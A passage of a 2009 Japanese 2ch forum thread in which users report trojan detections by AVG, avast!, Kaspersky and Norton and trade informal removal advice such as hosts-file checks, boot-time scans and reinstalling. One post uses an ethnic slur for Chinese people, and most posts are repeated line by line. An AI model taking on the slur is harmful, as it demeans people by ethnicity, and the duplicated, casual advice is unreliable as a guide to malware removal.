セキュリティ初心者質問スレッドpart120 の◆N9P3SuvBPo(AVG使いのヒマ人)に今後の指示をもらいましょう
http://pc11.2ch.net/test/read.cgi/sec/1250027233/
382 :名無しさん@お腹いっぱい。:2009/08/28(金) 17:51:57
RSAセキュリティがフィッシング対策の新サービス、トロイの木馬対策を国内提供
http://sokuho.vndv.com/it/
http://sokuho.vndv.com/it/
383 :名無しさん@お腹いっぱい。:2009/08/28(金) 18:15:03
PC起動した直後にタスクマネージャーを見ると
Reader_s.exeなるプロセスが存在しています
ぐぐったところトロイということなんですが
改めて今タスクマネージャーを見るとReader_s.exeが消えていました
ウィルスではなかったんでしょうか?
Reader_s.exeなるプロセスが存在しています
ぐぐったところトロイということなんですが
改めて今タスクマネージャーを見るとReader_s.exeが消えていました
ウィルスではなかったんでしょうか?
384 :名無しさん@お腹いっぱい。:2009/08/28(金) 21:57:21
FC2ブログの画像リンクをクリックすると、ノートンの警告画面ででTrojan.Giframeが
表示されます。変なGIFイメージが入り込んでるのが原因だと思いますが、どこから削除すればよいでしょうか?
表示されます。変なGIFイメージが入り込んでるのが原因だと思いますが、どこから削除すればよいでしょうか?
385 :名無しさん@お腹いっぱい。:2009/08/28(金) 22:25:43
386 :名無しさん@お腹いっぱい。:2009/08/29(土) 00:12:31
それ今楽天でも見つかってたな
387 :名無しさん@お腹いっぱい。:2009/08/29(土) 10:15:47
こういうの未だになくならないね。
上のGIFって画像データにエクスプロ意図が入っていて、バッファオーバラン
で実行されてしまうタイプですね。
昔のOS/2ってのは、CPUのメモリーがUNIXやWindowsと違ってフラットメモリー
モデルじゃなくてセグメントモデルで、データセグメントとコードセグメント
が分かれていて、x86の機能を上手く利用しているんだが、こういう
エクスプロイトには強いんだが、そういうOS使うと潜在的な危険が避けられる
んだがね。皆んな知らないのかね。
確か、今でもOS2Warpはパッチが出ていて、最新のハードとかサポートしてる
はず。確かSPでいうとSP14とかSP16が出ていたはず。
上のGIFって画像データにエクスプロ意図が入っていて、バッファオーバラン
で実行されてしまうタイプですね。
昔のOS/2ってのは、CPUのメモリーがUNIXやWindowsと違ってフラットメモリー
モデルじゃなくてセグメントモデルで、データセグメントとコードセグメント
が分かれていて、x86の機能を上手く利用しているんだが、こういう
エクスプロイトには強いんだが、そういうOS使うと潜在的な危険が避けられる
んだがね。皆んな知らないのかね。
確か、今でもOS2Warpはパッチが出ていて、最新のハードとかサポートしてる
はず。確かSPでいうとSP14とかSP16が出ていたはず。
388 :名無しさん@お腹いっぱい。:2009/08/29(土) 12:18:26
>>387
そういう機能も対策も、最近のCPUは実装されてる。
http://ja.wikipedia.org/wiki/NX%E3%83%93%E3%83%83%E3%83%88
Windowsだと、対応はXp Sp2以降。
既に実装されて数年たってるので、皆知ってると思うよ。
つーか、そういう書き方すると、OS/2とかいつの時代の話だとかつっこまれるかも。(w
そういう機能も対策も、最近のCPUは実装されてる。
http://ja.wikipedia.org/wiki/NX%E3%83%93%E3%83%83%E3%83%88
Windowsだと、対応はXp Sp2以降。
既に実装されて数年たってるので、皆知ってると思うよ。
つーか、そういう書き方すると、OS/2とかいつの時代の話だとかつっこまれるかも。(w
389 :名無しさん@お腹いっぱい。:2009/08/29(土) 16:26:24
>>387
埋め込まれていたのはマシンコードじゃなくてJavaScriptだった
【ノートン】Norton Internet Security Ver.172【2009】
http://pc11.2ch.net/test/read.cgi/sec/1251033748/765-780
画像ファイル八頭さん保全してないかしら
埋め込まれていたのはマシンコードじゃなくてJavaScriptだった
【ノートン】Norton Internet Security Ver.172【2009】
http://pc11.2ch.net/test/read.cgi/sec/1251033748/765-780
画像ファイル八頭さん保全してないかしら
390 :名無しさん@お腹いっぱい。:2009/08/29(土) 18:44:23
391 :名無しさん@そうだ選挙に行こう:2009/08/30(日) 11:23:47
Trojan/Pasta.7EC3というのに感染したようでホームページがかってに書き換えられてしまい、検索プロバイダも変更できなくされてしまいました。
avastやmalwarebyteのantimalwareでスキャンしたのですが駄目そうです。どなたかおたすけください。
チャンコロの検索ページがいつも出てきてうっとうしいです。
avastやmalwarebyteのantimalwareでスキャンしたのですが駄目そうです。どなたかおたすけください。
チャンコロの検索ページがいつも出てきてうっとうしいです。
392 :名無しさん@そうだ選挙に行こう:2009/08/30(日) 11:25:40
393 :名無しさん@そうだ選挙に行こう:2009/08/30(日) 13:01:32
リカバリ
394 :名無しさん@そうだ選挙に行こう:2009/08/30(日) 13:06:52
やばすぎやろ
HOSTSファイルとかチェックしたか?
HOSTSファイルとかチェックしたか?
ieを削除しようとsp2に下げたところsp3にできなくなりました。セキュリティー更新が出来ない状態です。フォーマットしようかな。
396 :名無しさん@そうだ選挙に行こう:2009/08/30(日) 14:51:34
そらリカバったほうがええんと違う?
とりあえずカスペを入れて様子見です。
398 :八頭 ◆YAGApwSaEw :2009/08/31(月) 00:23:32
>>391
「a-squared Free 4.5」 ウイルス・トロイの木馬のスキャンと駆除 (*常駐保護は無し *日本語インターフェイス )
ttp://www.emsisoft.com/en/software/free/
「a-squared Free 4.5」 ウイルス・トロイの木馬のスキャンと駆除 (*常駐保護は無し *日本語インターフェイス )
ttp://www.emsisoft.com/en/software/free/
399 :名無しさん@お腹いっぱい。:2009/08/31(月) 05:13:46
すまん誰か助けてくれ
Googleから翻訳サイト検索してある翻訳サイトを開いた瞬間にMcAfeeがトロイの木馬を検出…
即駆除してスキャンしてもウイルス見つからなかったんだが
それ以来Googleのトップを見ようとすると何故かその翻訳サイトにアクセスされて
その都度トロイの木馬を検出→駆除→スキャンしなきゃならん
早い話Googleが使えなくなった
どうすればいいかな?
Googleから翻訳サイト検索してある翻訳サイトを開いた瞬間にMcAfeeがトロイの木馬を検出…
即駆除してスキャンしてもウイルス見つからなかったんだが
それ以来Googleのトップを見ようとすると何故かその翻訳サイトにアクセスされて
その都度トロイの木馬を検出→駆除→スキャンしなきゃならん
早い話Googleが使えなくなった
どうすればいいかな?
400 :名無しさん@お腹いっぱい。:2009/08/31(月) 08:28:28
hostsファイルを見てみれば?
異常が無ければとりあえずパケットキャプチャしてみてグーグルから301やら返されなければ自分が原因だから
いろんなブラウザでグーグルにアクセスしてそれでも同じなら・・・・
あとは適当にがんばれ
書ききれん
異常が無ければとりあえずパケットキャプチャしてみてグーグルから301やら返されなければ自分が原因だから
いろんなブラウザでグーグルにアクセスしてそれでも同じなら・・・・
あとは適当にがんばれ
書ききれん
401 :名無しさん@お腹いっぱい。:2009/08/31(月) 17:08:58
>>398
ありがとうございます。カスペでは検出はしても削除はだめなので試してみます。
ありがとうございます。カスペでは検出はしても削除はだめなので試してみます。
402 :名無しさん@お腹いっぱい。:2009/08/31(月) 23:15:16
>>400
ありがとう!
とりあえずhostsファイルは書き換えられてなかった
パケットキャプチャは調べたけどイマイチよくわからなかった
あとyahoo検索→Googleでアクセスしたら変なトップページに繋がってトロイの木馬に引っかかったけど
66.249.89.147からアクセスしたら通常のトップページに繋がった
色々いじってみます
ありがとう!
とりあえずhostsファイルは書き換えられてなかった
パケットキャプチャは調べたけどイマイチよくわからなかった
あとyahoo検索→Googleでアクセスしたら変なトップページに繋がってトロイの木馬に引っかかったけど
66.249.89.147からアクセスしたら通常のトップページに繋がった
色々いじってみます
404 :名無しさん@お腹いっぱい。:2009/09/07(月) 08:30:02
405 :sage:2009/09/13(日) 21:35:44
たった今AVGでスキャンしたところ隔離室に
感染 トロイの木馬backdoor generic9.pvvとでました。
これは隔離されているのでこのままで大丈夫でしょうか?
ちなみに場所は
E:\Adobe Crearve Suite2 Premium\Keygen1.exe
とかいています。
どのような処置をすればいいですか?
感染 トロイの木馬backdoor generic9.pvvとでました。
これは隔離されているのでこのままで大丈夫でしょうか?
ちなみに場所は
E:\Adobe Crearve Suite2 Premium\Keygen1.exe
とかいています。
どのような処置をすればいいですか?
406 :名無しさん@お腹いっぱい。:2009/09/13(日) 21:46:50
笑えばいいと思うよ
407 :名無しさん@お腹いっぱい。:2009/09/14(月) 01:04:39
>>405
いきなりAdobeのKeygenとか...怪しファイルはダウンロードしちゃ駄目でしょ。(w
隔離されてるファイルは大丈夫だけど、いつも同じ事してるんなら、他にもウイルスいたり、
バックドアが開いていたり、botが住んでいるかもね。
隔離ファイルの消去方法は、AVG使ってる人が来れば教えてもらえるかも。
あたしゃAVG使ってないんで、細かい使い方はよくわからん。
あと、個人的には、Symantecとかのオンラインスキャンを1回はやっておいた方が良いと思う。
いきなりAdobeのKeygenとか...怪しファイルはダウンロードしちゃ駄目でしょ。(w
隔離されてるファイルは大丈夫だけど、いつも同じ事してるんなら、他にもウイルスいたり、
バックドアが開いていたり、botが住んでいるかもね。
隔離ファイルの消去方法は、AVG使ってる人が来れば教えてもらえるかも。
あたしゃAVG使ってないんで、細かい使い方はよくわからん。
あと、個人的には、Symantecとかのオンラインスキャンを1回はやっておいた方が良いと思う。
408 :名無しさん@お腹いっぱい。:2009/09/15(火) 06:26:30
KeyMaker-DVTにトロイ多いんだね
409 :名無しさん@お腹いっぱい。:2009/09/15(火) 22:45:11
すみませんが教えて下さい。
トロイの木馬に感染した症状でPCを起動する度に日付が2020年9月5日11時になるという症状はありますか?
トロイの木馬でなくてもこの様な症状になるウイルスはあるでしょうか?
会社のPCが二台この状態になって困ってますのでどなたか教えて下さい。
ちなみにどちらのPCも新品購入で1年しかたっていないので電池切れではなさそうです。
トロイの木馬に感染した症状でPCを起動する度に日付が2020年9月5日11時になるという症状はありますか?
トロイの木馬でなくてもこの様な症状になるウイルスはあるでしょうか?
会社のPCが二台この状態になって困ってますのでどなたか教えて下さい。
ちなみにどちらのPCも新品購入で1年しかたっていないので電池切れではなさそうです。
410 :名無しさん@お腹いっぱい。:2009/09/16(水) 11:51:45
あるよ。
とっととフォーマットおすすめ。
とっととフォーマットおすすめ。
411 :名無しさん@お腹いっぱい。:2009/09/16(水) 19:20:20
昨日から20時間以上も格闘して、結局クリーンインストールを決意した。orz
readers_sやらその亜種に感染したんだけど、フリーソフトでは駆除できなかった,Spybot、ThreatFire,PC Tool,といろいろ試したんだけどね。
カスペはさすがだと思った。映画Matrixに出てくるAgentのように自己増殖したファイルをことごとく見つけ出した。
あぅ〜,これから元の状態に戻すのに徹夜になるだろうw
readers_sやらその亜種に感染したんだけど、フリーソフトでは駆除できなかった,Spybot、ThreatFire,PC Tool,といろいろ試したんだけどね。
カスペはさすがだと思った。映画Matrixに出てくるAgentのように自己増殖したファイルをことごとく見つけ出した。
あぅ〜,これから元の状態に戻すのに徹夜になるだろうw
412 :名無しさん@お腹いっぱい。:2009/09/20(日) 01:38:19
感染しちゃった
耄碌しちゃったかな
耄碌しちゃったかな
413 :名無しさん@お腹いっぱい。:2009/09/23(水) 18:20:18
Trojan.Webkit!htmlに感染した
シマンテックのオンラインスキャンしたら感染ファイルが検出されたんだけど
それからシステム復元の無効化やら再起動して、
削除しようとしたら感染したファイルが見あたらない
再びスキャンしても検出されない…
その他色んなとこでスキャンしたんだけど何も出てこなかった
これは安心していいのかなぁ…謎だわ
シマンテックのオンラインスキャンしたら感染ファイルが検出されたんだけど
それからシステム復元の無効化やら再起動して、
削除しようとしたら感染したファイルが見あたらない
再びスキャンしても検出されない…
その他色んなとこでスキャンしたんだけど何も出てこなかった
これは安心していいのかなぁ…謎だわ
414 :名無しさん@お腹いっぱい。:2009/09/26(土) 07:47:56
今日2ちゃんねる見てたらだまされて感染したんですが…ほっといても大丈夫なんでしょうか?
415 :名無しさん@お腹いっぱい。:2009/09/26(土) 23:15:15
/)
///)
/,.=゙''"/
/ i f ,.r='"-‐'つ____ こまけぇこたぁいいんだよ!!
/ / _,.-‐'~/⌒ ⌒\
/ ,i ,二ニ⊃( ●). (●)\
/ ノ il゙フ::::::⌒(__人__)⌒::::: \
,イ「ト、 ,!,!| |r┬-| |
/ iトヾヽ_/ィ"\ `ー'´ /
///)
/,.=゙''"/
/ i f ,.r='"-‐'つ____ こまけぇこたぁいいんだよ!!
/ / _,.-‐'~/⌒ ⌒\
/ ,i ,二ニ⊃( ●). (●)\
/ ノ il゙フ::::::⌒(__人__)⌒::::: \
,イ「ト、 ,!,!| |r┬-| |
/ iトヾヽ_/ィ"\ `ー'´ /
416 :名無しさん@お腹いっぱい。:2009/10/06(火) 23:50:08
HEUR:Trojan-Downloader.Script.Generic
とあるサイトを開くと必ずカスペルスキーがコイツを検出しているんだけど、
どうしてだろう?
その都度削除しているみたいなんだけど。
とあるサイトを開くと必ずカスペルスキーがコイツを検出しているんだけど、
どうしてだろう?
その都度削除しているみたいなんだけど。
417 :名無しさん@お腹いっぱい。:2009/10/06(火) 23:51:11
【情弱速報】mixiのサーバがウイルス感染!?アクセスするとトロイを仕込まれる危険!【出会い厨死亡】
http://pc12.2ch.net/test/read.cgi/sns/1254189333/
159 名前:友達の友達の名無しさん[sage] 投稿日:2009/10/06(火) 23:34:29 ID:m3j+MiqZ0
なんか急に、アクセスするとTrojan-Downloader.Script.Genericが検出されるようになったんだけど俺だけ?
ソフトはカスペ。
160 名前:友達の友達の名無しさん[sage] 投稿日:2009/10/06(火) 23:35:43 ID:EvjybTvI0
>159 うちのカスペも反応する
161 名前:友達の友達の名無しさん[sage] 投稿日:2009/10/06(火) 23:36:12 ID:/gFxAyuB0
>>159 俺もカスペで検出される
162 名前:友達の友達の名無しさん[sage] 投稿日:2009/10/06(火) 23:43:10 ID:rSf7OeKz0
>159-161 同じくカスペ。誰か他ので引っかかってる人います?
http://pc12.2ch.net/test/read.cgi/sns/1254189333/
159 名前:友達の友達の名無しさん[sage] 投稿日:2009/10/06(火) 23:34:29 ID:m3j+MiqZ0
なんか急に、アクセスするとTrojan-Downloader.Script.Genericが検出されるようになったんだけど俺だけ?
ソフトはカスペ。
160 名前:友達の友達の名無しさん[sage] 投稿日:2009/10/06(火) 23:35:43 ID:EvjybTvI0
>159 うちのカスペも反応する
161 名前:友達の友達の名無しさん[sage] 投稿日:2009/10/06(火) 23:36:12 ID:/gFxAyuB0
>>159 俺もカスペで検出される
162 名前:友達の友達の名無しさん[sage] 投稿日:2009/10/06(火) 23:43:10 ID:rSf7OeKz0
>159-161 同じくカスペ。誰か他ので引っかかってる人います?
418 :名無しさん@お腹いっぱい。:2009/10/06(火) 23:55:36
419 :アンチトロイウィルス:2009/10/07(水) 11:31:19
420 :名無しさん@お腹いっぱい。:2009/10/07(水) 19:45:21
>>419
中国製って時点で回避だなぁ...同じ中国製なら、まだKINGの方がマシっぽい。どっちも使う気無いが。
中国製って時点で回避だなぁ...同じ中国製なら、まだKINGの方がマシっぽい。どっちも使う気無いが。
421 :名無しさん@お腹いっぱい。:2009/10/10(土) 20:27:01
胡散臭すぎだなw 中国製なら
Rising>Jiangmin>King>他
いずれにしろ台湾製のバスターのがまだマシだ
Rising>Jiangmin>King>他
いずれにしろ台湾製のバスターのがまだマシだ
422 :名無しさん@お腹いっぱい。:2009/10/10(土) 21:00:00
423 :名無しさん@お腹いっぱい。:2009/10/11(日) 04:15:31
424 :名無しさん@お腹いっぱい。:2009/10/15(木) 21:22:52
LAN上にある家族のPCがトロイに感染しました。
AVGでPSW.Generic7.AAULという名前でトロイとして検出されたファイルで、
tax-statement.exeが実行ファイルらしいのですが、すでに削除とOS起動時の
スタートアップはクリアになっています。
ルーターを使ってネットに接続しているのですが、これに感染した状態で
ショッピングサイトでクレジットカードの番号等の入力をした場合、
ルーター下であっても盗み見される可能性はありますか?
AVGでPSW.Generic7.AAULという名前でトロイとして検出されたファイルで、
tax-statement.exeが実行ファイルらしいのですが、すでに削除とOS起動時の
スタートアップはクリアになっています。
ルーターを使ってネットに接続しているのですが、これに感染した状態で
ショッピングサイトでクレジットカードの番号等の入力をした場合、
ルーター下であっても盗み見される可能性はありますか?
425 :名無しさん@お腹いっぱい。:2009/10/16(金) 13:57:32
NTTのセキュリティツールで検索したところ、
TROJ_ADROP.VXX 隔離できません と出てきました。
知識がぜんぜんないのでよくわからないのですが、これは何か
感染されているのでしょうか??
またどうしらたらいいでしょうか?
調べたのですが見つからなくてカキコしました。
TROJ_ADROP.VXX 隔離できません と出てきました。
知識がぜんぜんないのでよくわからないのですが、これは何か
感染されているのでしょうか??
またどうしらたらいいでしょうか?
調べたのですが見つからなくてカキコしました。
426 :名無しさん@お腹いっぱい。:2009/10/16(金) 18:04:21
アダルトサイトにアクセスしたら警報鳴りやがった。
これ管理人が入れてんのか?すざけんなああああああああ
これ管理人が入れてんのか?すざけんなああああああああ
427 :名無しさん@お腹いっぱい。:2009/10/16(金) 18:52:17
428 :名無しさん@お腹いっぱい。:2009/10/16(金) 19:11:05
>>427
怪しいのはなかったです
怪しいのはなかったです
429 :名無しさん@お腹いっぱい。:2009/10/16(金) 19:14:25
私もどこかで踏んだ・・・
AVGfreeで、ClickerとDownloaderっての
一応処理したけど、もう出てこないことを願うばかり
AVGfreeで、ClickerとDownloaderっての
一応処理したけど、もう出てこないことを願うばかり
430 :名無しさん@お腹いっぱい。:2009/10/16(金) 19:35:01
431 :名無しさん@お腹いっぱい。:2009/10/17(土) 12:43:50
432 :名無しさん@お腹いっぱい。:2009/10/17(土) 20:30:54
基本的なことだけど、タスクマネージャーのプロセスと
msconfigのスタートアップにも怪しいものがないかチェックした方がいいね。
もうやってるかもしれないけど。
msconfigのスタートアップにも怪しいものがないかチェックした方がいいね。
もうやってるかもしれないけど。
Security Toolってのが沸いて何もできなくなったので、結局再インストしたよ
トロイ恐ろしや・・・
トロイ恐ろしや・・・
434 :名無しさん@お腹いっぱい。:2009/10/20(火) 07:00:58
最近ある日からいきなりAVGでウイルス検索をしたらトロイの木馬やウイルスなどが
何個もいっぱいでてきて、それは全部修復して隔離可能なのですが、また次の日に検索するとまた同じくらいいろいろ
出てきて、これがい毎回なのですが、どうしたらいいでしょうか??
そのつどいつも修復して隔離してます。
何個もいっぱいでてきて、それは全部修復して隔離可能なのですが、また次の日に検索するとまた同じくらいいろいろ
出てきて、これがい毎回なのですが、どうしたらいいでしょうか??
そのつどいつも修復して隔離してます。
435 :名無しさん@お腹いっぱい。:2009/10/20(火) 07:10:15
436 :名無しさん@お腹いっぱい。:2009/10/20(火) 18:33:31
437 :名無しさん@お腹いっぱい。:2009/10/26(月) 07:13:08
リカバリで、トロイは完全削除できるんですか?
最近続けざまにマルウェア検出して凹んでいます。
を
(1回目)
AVG・無料版入れてた。
ニフティのカスペルスキー・オンラインスキャンをしたところ、トロイを一個発見。
トロイを削除したのち、気持ち悪いからPCをリカバリ。
(2回目)
ウィルスバスター2008・体験版入れてた。
バスターのフルスキャンでトロイを二個発見。
トロイを削除したのち、気持ち悪いからPCをリカバリ。
(3回目)
ノートンセキュリティ2008・体験版入れてた。
トラッキング・クッキーを一個発見。トロイは出ない。
「閲覧の履歴の削除」でクッキーは全部消したはずだけど、なんで出るんだろう?
クッキーを削除ののち、現在に至る。
(現在)
Windows Live OneCare・クリーンアップセンターを実行、
8件のレジストリ削除エラーが出て大変気持ちが悪い。
最近続けざまにマルウェア検出して凹んでいます。
を
(1回目)
AVG・無料版入れてた。
ニフティのカスペルスキー・オンラインスキャンをしたところ、トロイを一個発見。
トロイを削除したのち、気持ち悪いからPCをリカバリ。
(2回目)
ウィルスバスター2008・体験版入れてた。
バスターのフルスキャンでトロイを二個発見。
トロイを削除したのち、気持ち悪いからPCをリカバリ。
(3回目)
ノートンセキュリティ2008・体験版入れてた。
トラッキング・クッキーを一個発見。トロイは出ない。
「閲覧の履歴の削除」でクッキーは全部消したはずだけど、なんで出るんだろう?
クッキーを削除ののち、現在に至る。
(現在)
Windows Live OneCare・クリーンアップセンターを実行、
8件のレジストリ削除エラーが出て大変気持ちが悪い。
438 :名無しさん@お腹いっぱい。:2009/10/26(月) 23:18:23
AVGでスキャンかけたところ
Generic12.BQMMに感染していることが判明
すぐに隔離後削除しましたが感染していたと思われるファイルは
アクセスできないとのエラーで削除できずじまい
特にタスクをみても変なものが動いている様子はないのですが
詳しい方いたら詳細を教えてください
ちなみに今のところ症状らしきものは一切ありません
Generic12.BQMMに感染していることが判明
すぐに隔離後削除しましたが感染していたと思われるファイルは
アクセスできないとのエラーで削除できずじまい
特にタスクをみても変なものが動いている様子はないのですが
詳しい方いたら詳細を教えてください
ちなみに今のところ症状らしきものは一切ありません
439 :名無しさん@お腹いっぱい。:2009/10/28(水) 10:26:15
AVGがトロイの木馬backdoor.Generic12.BOFというウイルスを4件検出したのですが、
隔離することができれば以後問題無いでしょうか?
既に裏口が作られていた場合、リカバリー以外の対処法があるのかどうか...
隔離することができれば以後問題無いでしょうか?
既に裏口が作られていた場合、リカバリー以外の対処法があるのかどうか...
440 :名無しさん@お腹いっぱい。:2009/10/28(水) 23:29:07
IEでVeoh Web Playerが動かなくて困ってます
Firefox → 通常使うブラウザ。Flash&Veoh Web PlayerアドオンOff
IE → 動画閲覧専用
こんな使いかたしてる人、私以外にいないよね・・・
それと、Veohのサイトに行くと広告ポップアップが開くのは仕様でしょうか
ポップアップブロックすると、検索フィールドにフォーカスが当ったときに
新しいタブでad.yieldmanager.comが開くようページを改竄する念の入れようです。
スパイウエアの感染を疑ってノートンとSpyBot、Free online Trojan Scannerで
スキャンしてみましたが、ウイルスは検知されませんでした
Firefox → 通常使うブラウザ。Flash&Veoh Web PlayerアドオンOff
IE → 動画閲覧専用
こんな使いかたしてる人、私以外にいないよね・・・
それと、Veohのサイトに行くと広告ポップアップが開くのは仕様でしょうか
ポップアップブロックすると、検索フィールドにフォーカスが当ったときに
新しいタブでad.yieldmanager.comが開くようページを改竄する念の入れようです。
スパイウエアの感染を疑ってノートンとSpyBot、Free online Trojan Scannerで
スキャンしてみましたが、ウイルスは検知されませんでした
誤爆です。すみません
442 :名無しさん@お腹いっぱい。:2009/10/29(木) 01:11:52
age
443 :名無しさん@お腹いっぱい。:2009/10/29(木) 13:05:42
avast!4.8でローカルディスクの完全スキャンをやったのですが、
『ProAgent-AJ [Trj]』というトロイ(?)が一つ検出されました。
検索してみたんですが、同名のトロイ(?)について
日本語で書かれてるサイトが見つけられなかったのでかなり不安な状態です。
モノは試しと思い、トレンドマイクロのオンラインスキャンで
再度該当ファイルをスキャンしてみたのですが、
何故かこちらでは一つたりとも検出されませんでした。
該当ファイルはCDイメージファイルなんですが、
今まで特に問題もなく正常に機能してましたし、今も特に問題ないんです。
avast!4.8にて完全スキャンしたのは、先日変な現象が起きた為です。
amazon.co.jpでブラウズ中に、突然回線が切断→再接続→切断という感じで、
明らかにおかしい動作をしたので、完全スキャンに踏み切ったんです。
勿論、avast!4.8は普段から常駐させてますし(更新ファイルも常に最新)、
Spybot S&Dにて週2くらいの割合でスパイウェア対策もしてます。
切断→再接続の動作自体は今現在は正常で特に問題はないです。
『ProAgent-AJ [Trj]』の危険性はどれほどなのか御存知の方がおられましたら
是非アドバイスをお願いします。
『ProAgent-AJ [Trj]』というトロイ(?)が一つ検出されました。
検索してみたんですが、同名のトロイ(?)について
日本語で書かれてるサイトが見つけられなかったのでかなり不安な状態です。
モノは試しと思い、トレンドマイクロのオンラインスキャンで
再度該当ファイルをスキャンしてみたのですが、
何故かこちらでは一つたりとも検出されませんでした。
該当ファイルはCDイメージファイルなんですが、
今まで特に問題もなく正常に機能してましたし、今も特に問題ないんです。
avast!4.8にて完全スキャンしたのは、先日変な現象が起きた為です。
amazon.co.jpでブラウズ中に、突然回線が切断→再接続→切断という感じで、
明らかにおかしい動作をしたので、完全スキャンに踏み切ったんです。
勿論、avast!4.8は普段から常駐させてますし(更新ファイルも常に最新)、
Spybot S&Dにて週2くらいの割合でスパイウェア対策もしてます。
切断→再接続の動作自体は今現在は正常で特に問題はないです。
『ProAgent-AJ [Trj]』の危険性はどれほどなのか御存知の方がおられましたら
是非アドバイスをお願いします。
444 :名無しさん@お腹いっぱい。:2009/10/29(木) 16:47:53
ゲームをインストールしようと思ったら感染した模様
AVGでスキャンしたらCD-ROM自体に入ってるみたいだが、もう使わない方がいいかな?
AVGでスキャンしたらCD-ROM自体に入ってるみたいだが、もう使わない方がいいかな?
445 :名無しさん@お腹いっぱい。:2009/10/30(金) 22:02:39
トロイの木馬に感染したら
アプリケーションが起動しなくなってしまいました。
ウイルスバスター2010で削除したのですが
起動しない不具合は直りません。
どうすればいいでしょうか。
アプリケーションが起動しなくなってしまいました。
ウイルスバスター2010で削除したのですが
起動しない不具合は直りません。
どうすればいいでしょうか。
446 :名無しさん@お腹いっぱい。:2009/11/03(火) 16:33:44
447 :名無しさん@お腹いっぱい。:2009/11/04(水) 11:59:12
てすと
448 :名無しさん@お腹いっぱい。:2009/11/04(水) 12:06:12
お、書き込めた
AVGでのトロイの木馬backdoor.Generic12.BOFはここ数日名前が出てきているが
その名前でググれば解決するよ
隔離なれば一応問題なし
そしてそのご認知の原因であるJWordいらなければアンインストール
AVGでのトロイの木馬backdoor.Generic12.BOFはここ数日名前が出てきているが
その名前でググれば解決するよ
隔離なれば一応問題なし
そしてそのご認知の原因であるJWordいらなければアンインストール
449 :名無しさん@お腹いっぱい。:2009/11/04(水) 13:46:43
Jwordってタチ悪いよな
昔DivXに入ってたGainみたいだ
昔DivXに入ってたGainみたいだ
450 :名無しさん@お腹いっぱい。:2009/11/04(水) 15:29:30
ご認知→誤認知 ね
451 :名無しさん@お腹いっぱい。:2009/11/17(火) 01:22:03
先にノートン先生入ってて、AVG入れようとしたら
先生アンインストールしろって言われるんだが、
無視してインストールしてもおk?
先生アンインストールしろって言われるんだが、
無視してインストールしてもおk?
452 :名無しさん@お腹いっぱい。:2009/11/17(火) 19:43:55
無理
453 :名無しさん@お腹いっぱい。:2009/11/22(日) 00:26:46
PCがトロイの木馬に感染しています。(avast!で検出)
avast!の削除ボタンを押したらそのときは落ち着きますが、再起動するとまた同じ警告が出ます。
つまり削除方法がわかりません。推薦する処理はチェストに移動になっています。
あとCドライブを開こうとすると「C\ アプリケーションはwin32モードのため実行できません」と表示され開けません。
ウィルスと関係あるのでしょうか?
ファイル名:C:\DOCUME"1\○○○○\LOCALS"1\Temp\4tddfwq0.dll
マルウェアの名前:Win32:Patchd-HN[Tri]
マルウェアタイプ:トロイの木馬
VPSバージョン:091023-0.2009/10/23
avast!の削除ボタンを押したらそのときは落ち着きますが、再起動するとまた同じ警告が出ます。
つまり削除方法がわかりません。推薦する処理はチェストに移動になっています。
あとCドライブを開こうとすると「C\ アプリケーションはwin32モードのため実行できません」と表示され開けません。
ウィルスと関係あるのでしょうか?
ファイル名:C:\DOCUME"1\○○○○\LOCALS"1\Temp\4tddfwq0.dll
マルウェアの名前:Win32:Patchd-HN[Tri]
マルウェアタイプ:トロイの木馬
VPSバージョン:091023-0.2009/10/23
454 :名無しさん@お腹いっぱい。:2009/11/22(日) 00:35:38
>>453
> avast!の削除ボタンを押したらそのときは落ち着きますが、再起動するとまた同じ警告が出ます。
つ【ブートタイム検査】
ttp://www.iso-g.com/modules/xfsection/article.php?articleid=33
> オンデマンド検査や標準シールドなどによりマルウェアが発見されたら、
> 念のために ブートタイム検査 を実施しましょう ( Windows NT/2000/XP の場合 ) 。
> 特に何度も同じファイルが検出される場合に有効です。 ブートタイム検査は
> OS が完全に起動する前に検査を実施しますので、マルウェアが活性化する前に捉えることができます。
> avast!の削除ボタンを押したらそのときは落ち着きますが、再起動するとまた同じ警告が出ます。
つ【ブートタイム検査】
ttp://www.iso-g.com/modules/xfsection/article.php?articleid=33
> オンデマンド検査や標準シールドなどによりマルウェアが発見されたら、
> 念のために ブートタイム検査 を実施しましょう ( Windows NT/2000/XP の場合 ) 。
> 特に何度も同じファイルが検出される場合に有効です。 ブートタイム検査は
> OS が完全に起動する前に検査を実施しますので、マルウェアが活性化する前に捉えることができます。
455 :名無しさん@お腹いっぱい。:2009/11/22(日) 00:41:14
ブートタイム検査で先ほどのウィルスを発見したのでdelete all押しました。
ところがどっこい起動したらまた発見されやがりました。
これはもう手遅れでしょうか?
ところがどっこい起動したらまた発見されやがりました。
これはもう手遅れでしょうか?
457 :名無しさん@お腹いっぱい。:2009/11/22(日) 22:40:11
AVGで定期的にトロイの木馬Agent_r.PCってのが検出されるんだが・・・
同じ症状の人いない?
同じ症状の人いない?
458 :名無しさん@お腹いっぱい。:2009/11/23(月) 09:36:53
>>453と同じような感じで、朝起きてみたら
パソコンを起動→ユーザー選択→個人情報を読み込んでいます→デスクトップの壁紙だけ表示
で、固まってしまいます。
対処法があれば、どなたか教えて下さいまし。
パソコンを起動→ユーザー選択→個人情報を読み込んでいます→デスクトップの壁紙だけ表示
で、固まってしまいます。
対処法があれば、どなたか教えて下さいまし。
459 :名無しさん@お腹いっぱい。:2009/11/26(木) 14:23:35
>>456
おいらだったら、avast!で解決は諦めて、SUPERAntiSpywareかMalwarebytes' Anti-Malwareでスキャンしてみるかな。
おいらだったら、avast!で解決は諦めて、SUPERAntiSpywareかMalwarebytes' Anti-Malwareでスキャンしてみるかな。
460 :名無しさん@お腹いっぱい。:2009/11/29(日) 13:12:59
素朴な疑問なんだが、avast!を常駐してる状態でトロイ食わされるwebページって、どの辺りだろう?
461 :名無しさん@お腹いっぱい。:2009/12/02(水) 16:34:18
妹のPCメンテ中にAVGがtrojan downloader.generic9.vnzなるものを見つけた様子
トレンドマイクロオンラインスキャンでは検知できなかった
とりあえず隔離室から削除、レジストリエディタでも一通り削除して様子見中
大丈夫だといいな
トレンドマイクロオンラインスキャンでは検知できなかった
とりあえず隔離室から削除、レジストリエディタでも一通り削除して様子見中
大丈夫だといいな
462 :名無しさん@お腹いっぱい。:2009/12/02(水) 17:56:22
大丈夫だと思うけど、どうせならノートンのほうでスキャンしたほうがいいかな。
463 :名無しさん@お腹いっぱい。:2009/12/02(水) 23:02:56
avastのスレ見に行こうとしたらトロイの木馬いるって警告でたんだけど、
いつくらいで駆除されんだろ。2chって結構ウィルスいるんだな。
